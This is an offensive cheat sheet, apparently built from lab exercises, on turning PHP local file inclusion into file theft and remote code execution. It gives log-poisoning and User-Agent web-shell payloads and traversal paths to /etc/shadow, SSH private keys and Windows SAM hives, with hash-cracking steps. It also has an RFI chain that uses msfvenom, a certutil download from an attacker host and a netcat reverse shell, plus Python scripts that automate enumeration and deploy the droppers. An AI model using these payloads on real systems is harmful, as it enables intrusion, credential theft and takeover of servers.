# LFI

Goals (a parameter that ends up in include()/require(), fopen() or similar lets us pull arbitrary files from the target):

  • Try to read internal/local files (credentials, keys, process information)
  • Try to read webserver files (source code and configuration, which point at the next thing to read)

# Log Poisoning

If the parameter is fed to include()/require() (not just read back to us) and the webserver's own logs are readable by the PHP user, we can get RCE: write PHP into a logged field (User-Agent, request line), then include the log.

# Make the webserver log our php command below
# Using Curl: escape the $ (inside double quotes bash expands $_GET to nothing) and keep single quotes inside the PHP,
# because Apache writes a double quote to the log as \" and that is a parse error once the log is included
curl -A "<?php echo shell_exec(\$_GET['cmd']);?>" http://10-10-23-21.p.thmlabs.com/login.php

# Using Netcat: the line is not valid HTTP, but Apache still writes it to access.log as the request of a 400 response
$ nc -nv 10.10.10.x 80
<?php echo shell_exec($_GET['cmd']);?>

# Access the logs and enter the command, for example
http://10.10.10.x:80/index.php?page=C:/xampp/apache/logs/access.log&cmd=whoami
# Linux equivalents: /var/log/apache2/access.log, /var/log/httpd/access_log, /var/log/nginx/access.log
# Poison once, carefully: a PHP parse error anywhere in the log breaks every later include of it until the log rotates

# Proc Environ Injection

curl "http://mywebsite.com/index.php?view=../../../proc/self/environ"

If we get a response like HTTP_USER_AGENT="curl/7.57.0"</p> </body>, the request headers land in the PHP process's environment and we can poison the User-Agent header. In Burp, change the request like this:

GET /index.php?view=../../../proc/self/environ&cmd=whoami HTTP/1.1
Host: mywebsite.com
User-Agent: <?php echo shell_exec($_GET['cmd']);?>

# This only works where PHP runs as a per-request CGI process. Under mod_php (and usually php-fpm) /proc/self/environ is the server's startup environment with no HTTP_* variables, so the first curl shows no HTTP_USER_AGENT and the trick is off the table.

# PHP Filter to read local files

# Wrapping the include in php://filter base64-encodes the file instead of executing it, so PHP source (config files, index.php itself) comes back intact. Decode with base64 -d.
http://10.10.10.x/index.php?page=php://filter/convert.base64-encode/resource=index
# resource=index with no extension works when the app appends .php to the parameter; otherwise give the full path
http://10.10.10.x/index.php?page=php://filter/convert.base64-encode/resource=/var/www/html/wordpress/wp-config.php

# Windows System Files

# Usually %SYSTEMROOT% = C:\Windows. The webserver does not expand the variable, so request the literal path (C:/Windows/... with forward slashes is fine in PHP).
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%SYSTEMROOT%\System32\config\SAM
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\SYSTEM
%SYSTEMROOT%\System32\config\RegBack\system
# The live hives under System32\config are locked while Windows runs, so the repair\ and RegBack\ copies are the ones an LFI usually gets (RegBack is empty by default since Windows 10 1803).
# The hives are binary: save them with curl --output, or pull them through php://filter base64 so the page's HTML does not corrupt them.

1. Generate a hash file for John using pwdump (creddump) or samdump2. Both need the SYSTEM hive as well as SAM: the boot key in SYSTEM decrypts the hashes in SAM.
pwdump SYSTEM SAM > sam.txt
samdump2 SYSTEM SAM -o sam.txt
# or with impacket: impacket-secretsdump -sam SAM -system SYSTEM LOCAL

2. Then crack it
john --format=NT sam.txt

# Linux Files

# Three ../ reach / only if the script sits three directories deep; extra ../ are harmless once at /, so use more rather than fewer
http://url/index.php?page=../../../etc/passwd
http://url/index.php?page=../../../etc/shadow
# /etc/shadow is root-only: if it comes back, the webserver runs as root
http://url/index.php?page=../../../home/user/.ssh/id_rsa.pub
http://url/index.php?page=../../../home/user/.ssh/id_rsa
http://url/index.php?page=../../../home/user/.ssh/authorized_keys
# Read cmdline of running processes (argv is NUL-separated, so the browser shows the arguments run together)
http://url/index.php?page=../../../proc/self/cmdline
http://url/index.php?page=../../../proc/1/cmdline
http://url/index.php?page=../../../proc/2/cmdline
...
# Quick script to test all processes (PIDs start at 1; tr makes the NUL-separated argv readable)
for i in $(seq 1 2000); do echo "$i:"; curl -s "http://url/index.php?page=../../../proc/$i/cmdline" --output - | tr '\0' ' '; echo; done

# Read details of the webserver's own process (a directory cannot be included, so ask for a file under /proc/self/)
http://url/index.php?page=../../../proc/self/status
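The /proc walk above, as an added example in Python rather than the notes' own one-liner: it splits the NUL-separated argv properly, drops dead PIDs and kernel threads (empty cmdline), and takes the fetch function as a parameter so the loop can be exercised offline. The `?page=` parameter, the traversal depth and SAMPLE_PROC (a constructed stand-in for the target's /proc) are assumptions.

```python
#!/usr/bin/env python3
"""Enumerate processes through an LFI by including /proc/<pid>/cmdline.

Added example, not code from the original notes. Assumes ?page= is the
include parameter and that DEPTH "../" segments reach / (extra ones are
harmless, so err high). SAMPLE_PROC is constructed to run the loop offline.
"""
import functools
import sys
import urllib.request
from typing import Callable, Dict, List

DEPTH = 3  # matches the ../../../ used in the notes; raise it if the script sits deeper


def traversal(path: str, depth: int = DEPTH) -> str:
    return "../" * depth + path.lstrip("/")


def parse_cmdline(raw: bytes) -> List[str]:
    """/proc/<pid>/cmdline is argv with NUL separators and a trailing NUL; a
    browser shows the arguments run together, hence the split here."""
    return [a.decode("utf-8", "replace") for a in raw.split(b"\0") if a]


def http_fetch(base: str, param: str, path: str) -> bytes:
    """Body of the include; empty on any error (missing PID, hidepid=2 mount, timeout).
    If the app wraps the include in HTML, strip that wrapper here before parsing."""
    try:
        with urllib.request.urlopen(f"{base}?{param}={traversal(path)}", timeout=5) as resp:
            return resp.read()
    except Exception:
        return b""


def enumerate_processes(fetch: Callable[[str], bytes], max_pid: int = 2000) -> Dict[int, List[str]]:
    """Walk PIDs 1..max_pid and keep the ones that returned a cmdline.
    Kernel threads have an empty cmdline, so they drop out along with dead PIDs."""
    found = {}
    for pid in range(1, max_pid + 1):
        argv = parse_cmdline(fetch(f"/proc/{pid}/cmdline"))
        if argv:
            found[pid] = argv
    return found


SAMPLE_PROC = {  # constructed stand-in for the target's /proc
    "/proc/1/cmdline": b"/sbin/init\0",
    "/proc/873/cmdline": b"/usr/sbin/apache2\0-k\0start\0",
}


def sample_fetch(path: str) -> bytes:
    return SAMPLE_PROC.get(path, b"")


if __name__ == "__main__":
    if len(sys.argv) != 2:
        sys.exit("usage: procwalk.py http://host/index.php")
    fetch = functools.partial(http_fetch, sys.argv[1], "page")
    for pid, argv in enumerate_processes(fetch).items():
        print(pid, " ".join(argv))
```

Against a real target this is 2000 requests; if the host mounts /proc with hidepid=2 only the webserver's own processes come back, which is itself worth knowing.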

More here: https://github.com/D35m0nd142/LFISuite/blob/master/pathtotest.txt

# Apache

# Apache configuration in Ubuntu (gives DocumentRoot and the other vhosts, whose config files are the next thing to read; monitors.htb.conf is one such vhost file)
http://url/index.php?page=../../../etc/apache2/sites-available/000-default.conf
http://url/index.php?page=../../../etc/apache2/sites-available/monitors.htb.conf

# LFI to RCE to Shell Trick

This is LFI turned into remote file inclusion (RFI): the same include parameter accepts a URL, so a server we control supplies the PHP that the target executes. It needs allow_url_include=On (and allow_url_fopen=On) in php.ini, which is why step 1 tests with a harmless phpinfo() before anything else.

1 - Check for RCE
Create a file in Kali
phpinfo.php
----------
<?php
phpinfo();
?>
----------

2 - Start Python Webserver (a plain file server that hands back the PHP source unexecuted; do not serve these files from a PHP-enabled host)
$ python3 -m http.server 80

3 - Use LFI to call Kali webserver
$ curl "http://192.168.68.53:8080/site/index.php?page=http://192.168.49.68/phpinfo.php"
If the phpinfo() page comes back, the target fetched and executed our file. Note disable_functions (system must not be listed) and which user PHP runs as before going on.

4 - Get a Reverse Shell
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.49.68 LPORT=445 -f exe > shell.exe
# put shell.exe in the directory the http.server serves so certutil can fetch it

Create another PHP file to be executed that will download our reverse shell:
pwn.php
-------
<?php
$exec = system('certutil.exe -urlcache -split -f "http://192.168.49.68/shell.exe" shell.exe', $val);
?>
-------

$ curl "http://192.168.68.53:8080/site/index.php?page=http://192.168.49.68/pwn.php"
# certutil saves shell.exe in the PHP process's working directory, which is why the next stage runs it by bare name

Create a PHP file that will execute the reverse shell:
pwn-execute.php
-------
<?php
$exec = system('shell.exe', $val);
?>
-------

# Start the listener first; the curl stays open while the shell lives, because system() waits for shell.exe to exit
$ nc -lnvp 445
$ curl "http://192.168.68.53:8080/site/index.php?page=http://192.168.49.68/pwn-execute.php"
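Before hosting the droppers it is worth confirming the php.ini settings this chain depends on instead of eyeballing the phpinfo() page. The script below is an added example (not code from the original notes): it parses the phpinfo() response for allow_url_fopen, allow_url_include and disable_functions, renders the three dropper files with the attacker host filled in, and triggers the target. The addresses, the `?page=` parameter and SAMPLE_PHPINFO (a constructed excerpt of phpinfo() output) are assumptions; the directive names and the table layout phpinfo() uses are real.

```python
#!/usr/bin/env python3
"""RFI chain helper: confirm the php.ini settings the chain needs, render the
three droppers with the attacker address filled in, and trigger the target.

Added example, not code from the original notes. The ?page= parameter, the
addresses and SAMPLE_PHPINFO (a constructed excerpt of phpinfo() output) are
assumptions; the directives and their phpinfo() table layout are real.
Assumes `python3 -m http.server 80` is already serving the www directory.
"""
import os
import re
import sys
import urllib.request
from typing import Dict, Set

# phpinfo() prints each directive as
#   <tr><td class="e">name</td><td class="v">local</td><td class="v">master</td></tr>
ROW = re.compile(r'<td class="e">\s*([\w.]+)\s*</td>\s*<td class="v">(.*?)</td>', re.S)
TAG = re.compile(r"<[^>]+>")

REQUIRED = {"allow_url_fopen": "On", "allow_url_include": "On"}


def parse_phpinfo(html: str) -> Dict[str, str]:
    """Directive -> local value, with <i>no value</i> and similar markup flattened to text."""
    return {name: TAG.sub("", value).strip() for name, value in ROW.findall(html)}


def rfi_possible(html: str) -> bool:
    """Both switches must be On; allow_url_include defaults to Off, which is why most LFIs are not RFIs."""
    info = parse_phpinfo(html)
    return all(info.get(k) == v for k, v in REQUIRED.items())


def disabled_functions(html: str) -> Set[str]:
    """disable_functions as a set; system in here means the droppers below need another primitive."""
    raw = parse_phpinfo(html).get("disable_functions", "")
    return {f.strip() for f in raw.split(",") if f.strip() and f.strip() != "no value"}


def render_droppers(lhost: str) -> Dict[str, str]:
    """The three files the steps above host; only the attacker host changes between engagements."""
    return {
        "phpinfo.php": "<?php phpinfo(); ?>",
        "pwn.php": ("<?php system('certutil.exe -urlcache -split -f "
                    '"http://' + lhost + '/shell.exe" shell.exe\'); ?>'),
        "pwn-execute.php": "<?php system('shell.exe'); ?>",
    }


def trigger(target: str, param: str, attacker_url: str) -> str:
    """Make the target include a URL from our server and return the rendered body."""
    with urllib.request.urlopen(f"{target}?{param}={attacker_url}", timeout=60) as resp:
        return resp.read().decode("utf-8", "replace")


SAMPLE_PHPINFO = """
<tr><td class="e">allow_url_fopen</td><td class="v">On</td><td class="v">On</td></tr>
<tr><td class="e">allow_url_include</td><td class="v">On</td><td class="v">On</td></tr>
<tr><td class="e">disable_functions</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
"""

if __name__ == "__main__":
    if len(sys.argv) != 4:
        sys.exit("usage: rfi.py http://target/site/index.php http://ATTACKER wwwdir")
    target, attacker, wwwdir = sys.argv[1:]
    for name, body in render_droppers(attacker.split("//", 1)[1]).items():
        with open(os.path.join(wwwdir, name), "w") as fh:
            fh.write(body)
    info = trigger(target, "page", f"{attacker}/phpinfo.php")
    if not rfi_possible(info):
        sys.exit("target did not execute phpinfo.php, or allow_url_include is Off")
    print("disabled functions:", sorted(disabled_functions(info)) or "none")
    print("shell.exe + listener ready? then trigger pwn.php, and after it returns, pwn-execute.php")
```

The check matters because a target that merely echoes the remote file (allow_url_fopen on, allow_url_include off) looks like a hit in the browser but never executes anything.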